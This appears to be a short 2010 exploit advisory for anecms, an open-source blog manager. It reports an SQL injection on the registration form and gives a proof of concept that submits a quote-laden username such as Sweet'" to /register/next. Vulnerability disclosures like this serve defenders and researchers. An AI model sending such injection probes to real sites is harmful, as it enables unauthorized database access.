52 lines
No EOL
2 KiB
Text
52 lines
No EOL
2 KiB
Text
############################################################################
|
|
# #
|
|
# Exploit Title: anecms SQli #
|
|
# #
|
|
# Date: 23/08/2010 #
|
|
# #
|
|
# Author: Sweet #
|
|
# #
|
|
# Contact : charif38@hotmail.fr #
|
|
# #
|
|
# Software Link: anecms.com #
|
|
# #
|
|
# Download: anecms.com/anecms.zip #
|
|
# #
|
|
# Version: All #
|
|
# #
|
|
# Tested on: WinXp sp3 #
|
|
# Description : anecms is an open source blog manager #
|
|
# #
|
|
# #
|
|
# #
|
|
############################################################################
|
|
|
|
Sqli:
|
|
|
|
The POST variable username has been set to sweet'" on http://vulnerable.com/register/next
|
|
|
|
Poc:
|
|
|
|
http://www.example.com/register/next
|
|
|
|
username = Sweet'"
|
|
|
|
password = test
|
|
|
|
re password = test
|
|
|
|
email = charif38@hotmail.fr
|
|
|
|
then register :]
|
|
|
|
screen : http://img830.imageshack.us/img830/1213/anecm.jpg
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Saha Ftourkoum et 1,2,3 viva L'Algerie :)) |